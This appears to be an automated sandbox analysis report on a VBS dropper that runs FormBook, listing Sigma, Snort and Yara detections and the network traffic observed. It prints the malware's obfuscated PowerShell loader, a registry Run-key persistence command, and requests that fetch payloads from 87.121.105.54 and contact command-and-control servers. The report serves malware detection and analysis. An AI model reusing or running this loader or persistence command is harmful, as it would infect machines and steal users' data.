        • 0xdf49:$e4: Start-Process
        • 0x17ac0:$e4: Get-Process

        Sigma Signatures

        System Summary

        barindex
        Sigma detected: WScript or CScript Dropper
        Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\01105751.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\01105751.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4004, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\01105751.vbs", ProcessId: 5176, ProcessName: wscript.exe
        Sigma detected: Wab/Wabmig Unusual Parent Or Child Processes
        Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Achaque" /t REG_EXPAND_SZ /d "%Akkvisitiv% -w 1 $Europiums=(Get-ItemProperty -Path 'HKCU:\Respirometres\').Xenoplastic;%Akkvisitiv% ($Europiums)", CommandLine: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Achaque" /t REG_EXPAND_SZ /d "%Akkvisitiv% -w 1 $Europiums=(Get-ItemProperty -Path 'HKCU:\Respirometres\').Xenoplastic;%Akkvisitiv% ($Europiums)", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Program Files (x86)\windows mail\wab.exe", ParentImage: C:\Program Files (x86)\Windows Mail\wab.exe, ParentProcessId: 5512, ParentProcessName: wab.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Achaque" /t REG_EXPAND_SZ /d "%Akkvisitiv% -w 1 $Europiums=(Get-ItemProperty -Path 'HKCU:\Respirometres\').Xenoplastic;%Akkvisitiv% ($Europiums)", ProcessId: 3360, ProcessName: cmd.exe
        Sigma detected: CurrentVersion Autorun Keys Modification
        Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: %Akkvisitiv% -w 1 $Europiums=(Get-ItemProperty -Path 'HKCU:\Respirometres\').Xenoplastic;%Akkvisitiv% ($Europiums), EventID: 13, EventType: SetValue, Image: C:\Windows\SysWOW64\reg.exe, ProcessId: 5616, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Achaque
        Sigma detected: Direct Autorun Keys Modification
        Source: Process startedAuthor: Victor Sergeev, Daniil Yugoslavskiy, oscd.community: Data: Command: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Achaque" /t REG_EXPAND_SZ /d "%Akkvisitiv% -w 1 $Europiums=(Get-ItemProperty -Path 'HKCU:\Respirometres\').Xenoplastic;%Akkvisitiv% ($Europiums)", CommandLine: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Achaque" /t REG_EXPAND_SZ /d "%Akkvisitiv% -w 1 $Europiums=(Get-ItemProperty -Path 'HKCU:\Respirometres\').Xenoplastic;%Akkvisitiv% ($Europiums)", CommandLine|base64offset|contains: DA, Image: C:\Windows\SysWOW64\reg.exe, NewProcessName: C:\Windows\SysWOW64\reg.exe, OriginalFileName: C:\Windows\SysWOW64\reg.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Achaque" /t REG_EXPAND_SZ /d "%Akkvisitiv% -w 1 $Europiums=(Get-ItemProperty -Path 'HKCU:\Respirometres\').Xenoplastic;%Akkvisitiv% ($Europiums)", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 3360, ParentProcessName: cmd.exe, ProcessCommandLine: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Achaque" /t REG_EXPAND_SZ /d "%Akkvisitiv% -w 1 $Europiums=(Get-ItemProperty -Path 'HKCU:\Respirometres\').Xenoplastic;%Akkvisitiv% ($Europiums)", ProcessId: 5616, ProcessName: reg.exe
        Sigma detected: Potential Persistence Attempt Via Run Keys Using Reg.EXE
        Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Achaque" /t REG_EXPAND_SZ /d "%Akkvisitiv% -w 1 $Europiums=(Get-ItemProperty -Path 'HKCU:\Respirometres\').Xenoplastic;%Akkvisitiv% ($Europiums)", CommandLine: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Achaque" /t REG_EXPAND_SZ /d "%Akkvisitiv% -w 1 $Europiums=(Get-ItemProperty -Path 'HKCU:\Respirometres\').Xenoplastic;%Akkvisitiv% ($Europiums)", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Program Files (x86)\windows mail\wab.exe", ParentImage: C:\Program Files (x86)\Windows Mail\wab.exe, ParentProcessId: 5512, ParentProcessName: wab.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Achaque" /t REG_EXPAND_SZ /d "%Akkvisitiv% -w 1 $Europiums=(Get-ItemProperty -Path 'HKCU:\Respirometres\').Xenoplastic;%Akkvisitiv% ($Europiums)", ProcessId: 3360, ProcessName: cmd.exe
        Sigma detected: Suspicious Copy From or To System Directory
        Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, Tim Shelton (HAWK.IO), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\SysWOW64\xcopy.exe", CommandLine: "C:\Windows\SysWOW64\xcopy.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\xcopy.exe, NewProcessName: C:\Windows\SysWOW64\xcopy.exe, OriginalFileName: C:\Windows\SysWOW64\xcopy.exe, ParentCommandLine: "C:\Program Files (x86)\wgDrSTbxuDuJLxUFixRFuyhAkBSOdBneRpJXCfVkaeok\TsrCaEwNrfOKANGWcsg.exe" , ParentImage: C:\Program Files (x86)\wgDrSTbxuDuJLxUFixRFuyhAkBSOdBneRpJXCfVkaeok\TsrCaEwNrfOKANGWcsg.exe, ParentProcessId: 4092, ParentProcessName: TsrCaEwNrfOKANGWcsg.exe, ProcessCommandLine: "C:\Windows\SysWOW64\xcopy.exe", ProcessId: 6664, ProcessName: xcopy.exe
        Sigma detected: Suspicious Powershell In Registry Run Keys
        Source: Registry Key setAuthor: frack113, Florian Roth (Nextron Systems): Data: Details: %Akkvisitiv% -w 1 $Europiums=(Get-ItemProperty -Path 'HKCU:\Respirometres\').Xenoplastic;%Akkvisitiv% ($Europiums), EventID: 13, EventType: SetValue, Image: C:\Windows\SysWOW64\reg.exe, ProcessId: 5616, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Achaque
        Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
        Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\01105751.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\01105751.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4004, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\01105751.vbs", ProcessId: 5176, ProcessName: wscript.exe
        Sigma detected: Non Interactive PowerShell Process Spawned
        Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Retorsionshandlingenllustrationer = 1;$Elytrigerous='S';$Elytrigerous+='ubstrin';$Elytrigerous+='g';Function Programregningsfunktionens($Ridderne){$Retorsionshandlingennfraocular=$Ridderne.Length-$Retorsionshandlingenllustrationer;For($Retorsionshandlingen=5; $Retorsionshandlingen -lt $Retorsionshandlingennfraocular; $Retorsionshandlingen+=(6)){$Outsmokes+=$Ridderne.$Elytrigerous.Invoke( $Retorsionshandlingen, $Retorsionshandlingenllustrationer);}$Outsmokes;}function Gracy216($Begrendes){. ($Antediluvianske) ($Begrendes);}$Diskoskasteren=Programregningsfunktionens 's.perM L deoLandszAccomiTurbolBrystlSu.loa Inte/Linje5.ilfo.Brneb0B,ddi illi(MamelWKortsiExoranBowkndSp,dho.urvew,ndtrsFjase utotNmilepTb,een marga1San.u0Balli.Montr0H,rsk;.ykke BrakpWxanthi ,ervnReprs6trova4Filet;D,awc vidnxT,gue6Admin4Cotra;Insci Un btrTogstvEgipt:Inter1Riv l2For e1 daun. Gens0Sknde)Neutr Trak GRepudeGuldkc BelakTandloV.rde/ edb2Uheld0Sknhe1Elek.0Nell,0 ,rot1Un,en0Skibi1savne MordFautogiKo,merDe,inearom,fShipboHapaxxStork/Inten1Splas2Ds,es1 ilsk.Fylds0Capri ';$Sprayens=Programregningsfunktionens 'NondeU rubasVa neeBe,kir For -,geblAR.bbegholose Ta dn ParatPrivi ';$Reprogrammes=Programregningsfunktionens 'Stuf.hL.muctVersit SubspCosmo:etcif/Taksa/ Impl8Morph7Far,n.Bronz1Anal,2proc,1Ungl .unpol1Unper0F,nda5varmt. Gr,n5Roc,e4,sent/SeksaOOverrmMismamT.buleLandlsForcetmis,arAtropuDiscop,iske.AarsadUnsanesaanipBrodflDiameonamatySawai ';$Kretidseffekternes=Programregningsfunktionens 'Vejkr>Phisa ';$Antediluvianske=Programregningsfunktionens 'Etam.iRaadie saddxFasts ';$Gunlaying='Forraadnelig';Gracy216 (Programregningsfunktionens ' L urS AtikeSignatRecon- geneCPen,eo.endrnNovumtPrintelailanPorphtSt ir Peatw-AngloPObitaa elvetSymbohP,esh TrvemT,ough: ,aad\ Afv I Cerid.roldrCheskt UdpasFilerfMenneo C,lorsol,ceSuavenphaneiIndlenAabengSeepssUnche1Pre i9Wi,db7Super.RadiotNiveax t rrt Duod Evole-Un mmV selraMoraklPericuUnmoueAdvoc Melle$samstG estiu AppenRe,orl TeleaAnmrkySaponiImmunn BehvgAh.eh;Chabo ');Gracy216 (Programregningsfunktionens ' FramiHabi,fCacos larit( GrectV.stfe.olfisTalertRidge-OzonopJu iaaStoddtTabarhPigl, Pse THaand:Mosen\KomplI .oemd ilker tigetEperosKrig,f ColloPl.udr SubseMad lnNonmoiKromgnEnok g SaxosHaand1 Twir9Op oe7 Lov..Fedtst An txfarvet Rede) rtss{ Ka.me KropxFaksiiUdsket Sang} Un s; Gro, ');$Kvrne = Programregningsfunktionens 'NedraeUnconcUan.ghPet ooPaatn Munke%Kys.eaCasanpfy,depSixpedOver aGravit orema Ragl%Euboe\DevelS LovgaLaa,ngPlat sNematgBug.gn JalaiTegninOvercgArbe.eSl,knr Forsn p.ileafsvo. UnshISpirinM lartH ved .fsla&Neonr&Be.ri AdiabeTro ecUdganhSvovloeksp Trink$Ambol ';Gracy216 (Programregningsfunktionens 'Slide$SvmnigImperlAvn,soT aadb Rag,aPie alFordr: DemiVGoogoiQuittrShop k TrknsMycetofodbomHomemhDr sieEffemd De,isdawsst Bf eyOprikpBrancePatrunSongbs Thri=Nonam(Am.utcPillamSulted Stev Toksi/ ilhecRajah bed $.inguK lirevYderzrEutopnExaucehep.a)Kinkl ');Gracy21

        Snort Signatures

        Timestamp:05/02/24-17:15:19.980855
        SID:2855464
        Source Port:49727
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:05/02/24-17:15:22.949006
        SID:2855464
        Source Port:49728
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:05/02/24-17:15:04.232595
        SID:2855465
        Source Port:49725
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected

        Joe Sandbox Signatures

        Click to jump to signature section

        Show All Signature Results

        AV Detection

        barindex
        Antivirus detection for URL or domain
        Source: http://pesterbdd.com/images/Pester.pngURL Reputation: Label: malware
        Yara detected FormBook
        Source: Yara matchFile source: 00000017.00000002.3568353158.0000000001500000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000016.00000002.3568882333.00000000036A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000011.00000002.3231394969.0000000003200000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000016.00000002.3567612740.0000000002F30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000015.00000002.3568923150.00000000038D0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000011.00000002.3306907165.0000000025560000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000016.00000002.3568770287.0000000003660000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Binary string: C:\Windows\System.Management.Automation.pdbpdbion.pdbV source: powershell.exe, 0000000B.00000002.2871144100.00000000074DD000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb5T source: powershell.exe, 0000000B.00000002.2871144100.0000000007400000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdbn[ source: powershell.exe, 0000000B.00000002.2871144100.00000000074AA000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb5l source: powershell.exe, 0000000B.00000002.2871144100.0000000007400000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: wntdll.pdb source: wab.exe, xcopy.exe
        Source: Binary string: \??\C:\Windows\System.Management.Automation.pdb source: powershell.exe, 0000000B.00000002.2871144100.00000000074E5000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: xcopy.pdb source: wab.exe
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_02F4B7A0 FindFirstFileW,FindNextFileW,FindClose,22_2_02F4B7A0

        Software Vulnerabilities

        barindex
        Suspicious execution chain found
        Source: C:\Windows\System32\wscript.exeChild: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 4x nop then xor eax, eax22_2_02F393E0

        Networking

        barindex
        Snort IDS alert for network traffic
        Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.6:49725 -> 34.174.122.2:80
        Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.6:49727 -> 3.33.130.190:80
        Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.6:49728 -> 3.33.130.190:80
        Uses ping.exe to check the status of other devices and networks
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\PING.EXE ping google.com -n 1
        Source: Joe Sandbox ViewASN Name: ATGS-MMD-ASUS ATGS-MMD-ASUS
        Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.54
        Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.54
        Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.54
        Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.54
        Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.54
        Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.54
        Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.54
        Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.54
        Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.54
        Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.54
        Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.54
        Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.54
        Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.54
        Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.54
        Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.54
        Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.54
        Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.54
        Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.54
        Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.54
        Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.54
        Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.54
        Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.54
        Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.54
        Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.54
        Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.54
        Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.54
        Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.54
        Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.54
        Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.54
        Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.54
        Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.54
        Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.54
        Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.54
        Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.54
        Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.54
        Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.54
        Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.54
        Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.54
        Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.54
        Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.54
        Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.54
        Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.54
        Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.54
        Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.54
        Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.54
        Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.54
        Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.54
        Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.54
        Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.54
        Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.54
        Source: global trafficHTTP traffic detected: GET /Ommestrup.deploy HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: 87.121.105.54Connection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /iYbZIhIVLPBjJUzImyrJN72.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: 87.121.105.54Cache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /gnto/?P2v=kzXtiRyPGhR4rzp&4v8xJ8=F2aKH/UhYyQy5bhtG47arqZTAzYBZHKo8pZvH2jiqbKPAiUNCKzfvPloMCIQjvvo+O//vWhBzU38U00+OJnukLQGsUBXCgymNTKCViCR5sTiLbhUlqXxexqjYjSB6xlfqI4lO2I= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.facesofhoustontx.comConnection: closeUser-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
        Source: global trafficDNS traffic detected: DNS query: google.com
        Source: global trafficDNS traffic detected: DNS query: www.facesofhoustontx.com
        Source: global trafficDNS traffic detected: DNS query: www.timesrenewables.com
        Source: powershell.exe, 00000008.00000002.3288836081.000001EF28FF8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.3288836081.000001EF2AE16000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://87.121.105.54
        Source: powershell.exe, 00000008.00000002.3288836081.000001EF28FF8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://87.121.105.54/Ommestrup.deployP
        Source: powershell.exe, 00000008.00000002.3288836081.000001EF2AFCA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://87.121.H
        Source: wscript.exe, 00000000.00000003.2228249019.0000022CBEC96000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2227533901.0000022CBEC2E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2228795588.0000022CBEC96000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
        Source: wscript.exe, 00000000.00000002.2228998163.0000022CC0B70000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
        Source: wscript.exe, 00000000.00000003.2183539052.0000022CC0BA9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2182822284.0000022CC0BFE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2183808324.0000022CC0BD1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab?ae76aada72762
        Source: wscript.exe, 00000000.00000003.2183539052.0000022CC0BA9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2223236655.0000022CC0BD1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2183808324.0000022CC0BD1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com:80/msdownload/update/v3/static/trustedr/en/authrootstl.cab?ae76aada72
        Source: powershell.exe, 00000008.00000002.3522392723.000001EF38E41000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
        Source: powershell.exe, 00000008.00000002.3288836081.000001EF28FF8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
        Source: powershell.exe, 00000008.00000002.3288836081.000001EF28DD1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
        Source: powershell.exe, 00000008.00000002.3288836081.000001EF28FF8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
        Source: powershell.exe, 00000008.00000002.3288836081.000001EF28DD1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
        Source: powershell.exe, 00000008.00000002.3522392723.000001EF38E41000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
        Source: powershell.exe, 00000008.00000002.3522392723.000001EF38E41000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
        Source: powershell.exe, 00000008.00000002.3522392723.000001EF38E41000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
        Source: powershell.exe, 00000008.00000002.3288836081.000001EF28FF8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
        Source: powershell.exe, 00000008.00000002.3288836081.000001EF2A2CC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
        Source: powershell.exe, 00000008.00000002.3522392723.000001EF38E41000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe

        E-Banking Fraud

        barindex
        Yara detected FormBook
        Source: Yara matchFile source: 00000017.00000002.3568353158.0000000001500000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000016.00000002.3568882333.00000000036A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000011.00000002.3231394969.0000000003200000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000016.00000002.3567612740.0000000002F30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000015.00000002.3568923150.00000000038D0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000011.00000002.3306907165.0000000025560000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000016.00000002.3568770287.0000000003660000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

        System Summary

        barindex
        Malicious sample detected (through community Yara rule)
        Source: amsi64_5692.amsi.csv, type: OTHERMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
        Source: amsi32_6096.amsi.csv, type: OTHERMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
        Source: 00000017.00000002.3568353158.0000000001500000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: 00000016.00000002.3568882333.00000000036A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: 00000011.00000002.3231394969.0000000003200000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: 00000016.00000002.3567612740.0000000002F30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: 00000015.00000002.3568923150.00000000038D0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: 00000011.00000002.3306907165.0000000025560000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: 00000016.00000002.3568770287.0000000003660000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: Process Memory Space: powershell.exe PID: 5692, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
        Very long command line found
        Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 7566
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: Commandline size = 7566
        Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 7566Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: Commandline size = 7566Jump to behavior
        Wscript starts Powershell (via cmd or directly)
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c dir
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Retorsionshandlingenllustrationer = 1;$Elytrigerous='S';$Elytrigerous+='ubstrin';$Elytrigerous+='g';Function Programregningsfunktionens($Ridderne){$Retorsionshandlingennfraocular=$Ridderne.Length-$Retorsionshandlingenllustrationer;For($Retorsionshandlingen=5; $Retorsionshandlingen -lt $Retorsionshandlingennfraocular; $Retorsionshandlingen+=(6)){$Outsmokes+=$Ridderne.$Elytrigerous.Invoke( $Retorsionshandlingen, $Retorsionshandlingenllustrationer);}$Outsmokes;}function Gracy216($Begrendes){. ($Antediluvianske) ($Begrendes);}$Diskoskasteren=Programregningsfunktionens 's.perM L deoLandszAccomiTurbolBrystlSu.loa Inte/Linje5.ilfo.Brneb0B,ddi illi(MamelWKortsiExoranBowkndSp,dho.urvew,ndtrsFjase utotNmilepTb,een marga1San.u0Balli.Montr0H,rsk;.ykke BrakpWxanthi ,ervnReprs6trova4Filet;D,awc vidnxT,gue6Admin4Cotra;Insci Un btrTogstvEgipt:Inter1Riv l2For e1 daun. Gens0Sknde)Neutr Trak GRepudeGuldkc BelakTandloV.rde/ edb2Uheld0Sknhe1Elek.0Nell,0 ,rot1Un,en0Skibi1savne MordFautogiKo,merDe,inearom,fShipboHapaxxStork/Inten1Splas2Ds,es1 ilsk.Fylds0Capri ';$Sprayens=Programregningsfunktionens 'NondeU rubasVa neeBe,kir For -,geblAR.bbegholose Ta dn ParatPrivi ';$Reprogrammes=Programregningsfunktionens 'Stuf.hL.muctVersit SubspCosmo:etcif/Taksa/ Impl8Morph7Far,n.Bronz1Anal,2proc,1Ungl .unpol1Unper0F,nda5varmt. Gr,n5Roc,e4,sent/SeksaOOverrmMismamT.buleLandlsForcetmis,arAtropuDiscop,iske.AarsadUnsanesaanipBrodflDiameonamatySawai 